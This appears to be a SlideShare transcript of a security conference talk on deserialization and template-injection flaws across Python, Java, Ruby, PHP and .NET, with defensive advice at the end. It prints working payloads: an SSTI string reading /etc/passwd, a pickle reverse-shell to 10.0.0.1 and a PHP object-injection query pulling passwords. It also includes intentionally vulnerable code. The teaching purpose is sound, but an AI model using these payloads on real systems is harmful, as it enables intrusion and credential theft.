Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Vlada Kulish - Why So Serial?

150 views

Published on

Threats to Modern Serialization Capabilities

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Vlada Kulish - Why So Serial?

  1. 1. Vlada Kulish Security Engineer OWASP Lviv member
  2. 2. What is de/serialization Why is it important How it works and what’s the issue Examples & Demo
  3. 3. Idea
  4. 4. Types BINARY Java, Ruby READABLE YAML, XML, JSON HYBRID Python, PHP, Binary XML/JSON
  5. 5. Where it is Communicating data to different systems, process Wire protocols, web services Storing and re-using data Databases, cache servers, file systems Tokens HTTP cookies, HTML form parameters, API auth tokens
  6. 6. 2015 - java deserialization apocalypse
  7. 7. Are other languages safe?
  8. 8. Server-Side Template Injection http://address/injectedData Server Template {{5*5}} {{5*5}} 25 {{5*5}}
  9. 9. Problem @app.errorhandler(404) def page_not_found(e): template = '''{%% extends "layout.html" %%} {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.url) return render_template_string(template), 404 {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>aaa{{5*5}}</h3> </div> {%% endblock %%}
  10. 10. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
  11. 11. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} <type 'str'>, <type 'basestring'>, <type 'object'>.__class__.__mro__ [<type 'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>….] .__subclasses__()
  12. 12. How it works type class object subclass type params
  13. 13. It's DEMO time:)
  14. 14. Python Pickle Protocol v.0 – ACSII Protocol v.1 – Old binary format Protocol v.2 – New binary format
  15. 15. Pickle Virtual Machine Reconstruct a dict from the contents of the pickle. Create a class instance of the pickled object. Populate the class instance with the dict elements Instructure engine Stack Memo
  16. 16. GLOBAL and REDUCE Reduce - executes the callable Global – loads class object onto the PVM stack
  17. 17. Overwriting Old <Legitimate pickle> New <Inserted shellcode> Result Result of inserted shellcode, likely an error
  18. 18. Prepending Old <Legitimate pickle> New <Shellcode and some empty stack><Legitimate pickle> Result Original object
  19. 19. Altering Old <Legitimate pickle>…S’<html><h1>AAA…’n <Legitimate pickle> New <Legitimate pickle>…S’<html><h1>Surprise!…’n <Legitimate pickle> Result Identically-typed object to original with altered attribute value
  20. 20. Injecting Old <Legitimate pickle>…S’<html><body>Foo…’n <Legitimate pickle> New <Legitimate pickle>…S’<html><body> <Instruction returning string>…’n <Legitimate pickle> Result Identically-typed object to original with new attribute value assigned by executed instructions
  21. 21. Limitations There is no branching instruction There is no comparison instruction No exceptions and no error handling A pickle stream cannot overwrite or directly read itself using Pickle instructions Strings loaded in pickles do not undergo variable substitution Class instances and their methods cannot be directly referenced Only callables that are present in the top-level of a module are candidates for loading into the PVM
  22. 22. Vulnerable code filename = ’/tmp/some_file’ pickle.load(open(filename, "rb")) OR def server(skt): line = skt.recv(1024) obj = pickle.loads(line)
  23. 23. Vulnerable code def server(skt): line = skt.recv(1024) obj = pickle.loads(line) import pickle import socket import os class payload(object): def __reduce__(self): comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" return (os.system, (comm,)) payload = pickle.dumps( payload())
  24. 24. Useful Links •http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_ Slaviero_Sour_Pickles_WP.pdf •https://exploit-exercises.com/nebula/level17/ •https://blog.nelhage.com/2011/03/exploiting-pickle/
  25. 25. JAVA How to detect AC ED in HEX or R0 in base64 Java class names in the dump Errors
  26. 26. Useful Links https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet https://github.com/frohoff/ysoserial http://jackson.thuraisamy.me/runtime-exec-payloads.html https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-je nkins-opennms-and-your-application-have-in-common-this-vulnerability
  27. 27. Ruby CVE-2013-0156 Ruby on Rails XML processor YAML deserialization code execution Unsafe Object Deserialization Vulnerability in RubyGems CVE-2017-0903
  28. 28. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies def reset_password user = Marshal.load(Base64.decode64(params[:user])) unless params[:user].nil? … end <div class="content"> <%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %> … </div>
  29. 29. Useful Links http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-v ulnerability.html https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-l and-cve-2013-0156/ http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execu tion-vulnerability-explained/ https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at -the-rails-yaml-vulnerability/ https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Executi on
  30. 30. PHP __destruct() __wakeup()
  31. 31. PHP if (isset ($_COOKIE['leet_hax0r'])) { $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r'])); …} a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"que ry";s:38:"SELECT password AS username FROM users";s:4:"conn";N;}}
  32. 32. Real-life examples CVE-2015-8562: Joomla Remote Code Execution CVE-2015-7808: vBulletin 5 Unserialize Code Execution CVE-2015-2171: Slim Framework PHP Object Injection
  33. 33. Useful Links https://blog.checkpoint.com/wp-content/uploads/2016/08/Exp loiting-PHP-7-unserialize-Report-160829.pdf https://www.owasp.org/index.php/PHP_Object_Injection https://www.tarlogic.com/en/blog/how-php-object-injection- works-php-object-injection/ https://pagely.com/blog/2017/05/php-object-injection-insec ure-unserialize-wordpress
  34. 34. .Net CVE-2017-9424 - Breeze.Server.NET CVE-2017-9785 - NANCYFX NANCY UP TO 1.4.3/2.0 JSON DATA CSRF.CS CVE-2017-9822 - DNN (aka DotNetNuke) before 9.1.1 Remote Code Execution
  35. 35. Useful Links https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/ DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13t h-JSON-Attacks-wp.pdf https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_ Are_You_My_Type_WP.pdf https://blog.scrt.ch/2016/05/12/net-serialiception/
  36. 36. The DEFENCE Avoid magic methods Use as simple formats as possible Do not save session state on client Use White and Blacklists for classes Yes, manually serialize/ deserialize complex object Authentication+ Encryption DON’T TRUST DATA – VERIFY IT Use sandboxes
  37. 37. Thank you! Thanks https://explodingkittens.com/ for good mood and design ideas!

×